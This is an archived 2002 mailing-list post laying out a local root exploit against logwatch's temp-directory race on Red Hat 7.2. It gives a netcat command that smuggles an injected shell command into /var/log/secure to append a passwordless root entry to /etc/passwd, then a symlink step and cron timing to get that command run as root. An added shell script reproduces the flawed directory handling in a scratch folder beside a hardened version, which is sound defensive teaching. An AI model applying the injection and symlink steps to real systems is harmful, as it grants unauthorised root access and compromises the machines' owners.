Exploiting the race conditions in logwatch.

From: ano nym (an0nym0uzat_private)
Date: Sun Apr 07 2002 - 19:50:25 PDT


    Here are some of my ideas about exploiting the race condition in logwatch.
    
    logwatch processes different logfiles; let's take a look at
    /var/log/secure. First we need a way to smuggle a command into it; this is
    how I did it:
    
    $ nc 0 22
    SSH-1.99-OpenSSH_2.9p2
    '& echo hoho::0:0:>>/etc/passwd #
    Protocol mismatch.
    
    $ tail -f /var/log/secure
    Apr  8 04:37:33 xxxxx sshd[23420]: Bad protocol version identification ''& echo hoho::0:0:@>>/etc/passwd #' from 127.0.0.1
    
    Ok, now we have the command we want; how are we going to get it
    executed?
    
    ----- This is what logwatch does.
    
    Preprocessing LogFile: secure
    /bin/cat /var/log/secure  2>/dev/null | /etc/log.d/scripts/shared/applystddate >/tmp/logwatch.2318/secure
    DEBUG: Inside ApplyStdDate...
    DEBUG: Range: yesterday
    DEBUG: Looking For: Apr  6
    
    (the command string should be inserted the day BEFORE, if range is yesterday...)
    
    So, if we create a symlink...
    ln -s /etc/log.d/scripts/shared/applystddate secure, for example,
    the command will get executed when logwatch calls applystddate next time.
    (many other targets exist, for example /root/.bashrc etc...)
    
    We can of course use other logs than secure; for example "messages" and
    smuggle in the command using the ftpd etc...
    
    So, what are the problems?
    
    [code from logwatch]
    
    $TempDir = $Config{'tmpdir'} . "logwatch." . $$ . "/";
    
    if ( -d $TempDir ) {
        rmdir ($TempDir);
    }
    if ( -e $TempDir ) {
        unlink ($TempDir);
    }
    #### 1
    if ($Config{'debug'}>7) {
        print "\nMaking Temp Dir: " . $TempDir . "\n";
    }
    
    mkdir ($TempDir,0700);
    
    [code from logwatch]
    
    We need to create the dir logwatch.PID BEFORE "mkdir ($TempDir,0700);"
    and after/before #### 1. If not, we will not be able to create a symlink inside
    the dir (0700)...
    
    Another nice thing is that we can see when logwatch will be executed by
    looking at /etc/crontab; logwatch is in the dir /etc/cron.daily...
    
    (02 4 * * * root run-parts /etc/cron.daily)
    
    Note that the system I played with was a DEFAULT installation of
    redhat 7.2.
    
    later.
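The temp-dir handling quoted from logwatch above, reproduced in shell beside a hardened version and exercised against a pre-planted directory. This is an added example, not code from the post or from logwatch. It assumes a private scratch directory standing in for /tmp, a file named applystddate standing in for /etc/log.d/scripts/shared/applystddate, and made-up PID suffixes (1111, 2222) for the logwatch.PID directory name; the symlink is named "secure", matching the `ln -s ... secure` step in the post. The scenario shown is the one the quoted code cannot recover from without any timing: a logwatch.PID directory that already exists and is not empty, so rmdir fails, unlink fails (it is a directory), mkdir fails (it exists), and the write to $TempDir/secure follows whatever was planted there.

```shell
#!/bin/sh
# Added example, not logwatch's code. All paths live under a private scratch
# directory; nothing under /tmp or /etc is touched.

WORK=$(mktemp -d)                        # stands in for /tmp (assumed)
TARGET="$WORK/applystddate"              # stands in for /etc/log.d/scripts/shared/applystddate (assumed)
printf 'original script\n' > "$TARGET"

# Mirrors the quoted Perl: rmdir if it is a dir, unlink if something is there,
# mkdir with the return value ignored, then write the preprocessed log into it.
# On a pre-existing non-empty directory every one of those steps fails quietly
# and the final write follows the attacker's symlink.
vulnerable_prepare() {
    dir=$1
    if [ -d "$dir" ]; then rmdir "$dir" 2>/dev/null || :; fi   # fails: not empty
    if [ -e "$dir" ]; then rm -f "$dir" 2>/dev/null || :; fi   # fails: is a directory
    mkdir -m 0700 "$dir" 2>/dev/null || :                      # fails: exists; result ignored
    printf 'smuggled line\n' > "$dir/secure"                   # lands on $TARGET via the link
}

# Hardened: mkdir is atomic and fails when anything already sits at that path,
# so treat failure as a hard stop; then refuse to write through a symlink.
# (A real fix would also pick an unpredictable name, e.g. mktemp -d, instead of
# a PID-based one that is guessable once the cron run time is known.)
safe_prepare() {
    dir=$1
    if ! mkdir -m 0700 "$dir" 2>/dev/null; then
        return 1                                  # path already owned by someone: stop
    fi
    if [ -L "$dir/secure" ]; then
        return 1                                  # never write through a link
    fi
    printf 'smuggled line\n' > "$dir/secure"
}

# The attacker's preparation, done before logwatch runs: create the PID-named
# directory and plant a symlink named like the log file.
attacker_plant() {
    mkdir -p "$1"
    ln -s "$TARGET" "$1/secure"
}

# True while the target script still holds its original content.
target_intact() {
    [ "$(cat "$TARGET")" = "original script" ]
}

# Stand-alone demonstration: the vulnerable sequence clobbers the target, the
# hardened one refuses to proceed.
attacker_plant "$WORK/logwatch.1111"
vulnerable_prepare "$WORK/logwatch.1111"
target_intact || echo "vulnerable: $TARGET now contains: $(cat "$TARGET")"

printf 'original script\n' > "$TARGET"
attacker_plant "$WORK/logwatch.2222"
safe_prepare "$WORK/logwatch.2222" || echo "hardened: refused pre-existing $WORK/logwatch.2222"
target_intact && echo "hardened: $TARGET untouched"
```

Running it prints the clobbered content for the vulnerable path and the refusal for the hardened one. The refusal is the important part: the original code's rmdir/unlink/mkdir sequence never checks whether it actually ended up owning $TempDir, and a 0700 mode on mkdir does nothing when mkdir itself failed.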
    



    This archive was generated by hypermail 2b30 : Mon Apr 08 2002 - 00:30:29 PDT